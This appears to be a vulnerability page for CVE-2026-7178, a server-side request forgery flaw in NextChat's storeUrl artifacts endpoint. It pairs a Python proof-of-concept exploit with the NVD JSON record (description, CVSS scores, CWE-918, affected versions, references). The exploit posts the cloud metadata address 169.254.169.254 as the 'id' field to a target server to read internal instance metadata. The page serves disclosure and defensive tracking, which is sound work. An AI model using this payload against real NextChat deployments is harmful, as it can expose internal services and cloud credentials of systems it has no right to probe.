CVE-2026-7178

import requests # CVE-2026-7178 PoC for ChatGPTNextWeb NextChat SSRF # Target: storeUrl function in app/api/artifacts/route.ts target_url = "http://target-host:3000/api/artifacts/storeUrl" # Attempt to fetch internal metadata (e.g., AWS) or local port internal_target = "http://169.254.169.254/latest/meta-data/" payload = { "id": internal_target } try: response = requests.post(target_url, json=payload, timeout=5) if response.status_code == 200: print("[+] SSRF Successful! Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-7178", "sourceIdentifier": "[email protected]", "published": "2026-04-27T22:16:19.050", "lastModified": "2026-04-30T19:26:52.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in ChatGPTNextWeb NextChat up to 2.16.1. This affects the function storeUrl of the file app/api/artifacts/route.ts of the component Artifacts Endpoint. This manipulation of the argument ID causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextchat:nextchat:2.16.0:*:*:*:*:*:*:*", "matchCriteriaId": "A9914C8A-D623-470F-AB08-22AB34A87D4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextchat:nextchat:2.16.1:*:*:*:*:*:*:*", "matchCriteriaId": "C07942DD-696B-4AE6-BD2F-87ECBF749E92"}]}]}], "references": [{"url": "https://gist.github.com/YLChen-007/43252d45d75e8bdd2d45136fd6ffe8a5", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ChatGPTNextWeb/NextChat/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ChatGPTNextWeb/NextChat/issues/6741", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/submit/797646", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/359780", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/359780/cti", "source": "[email protected]", "tags": ["Permissions Required"]}]}}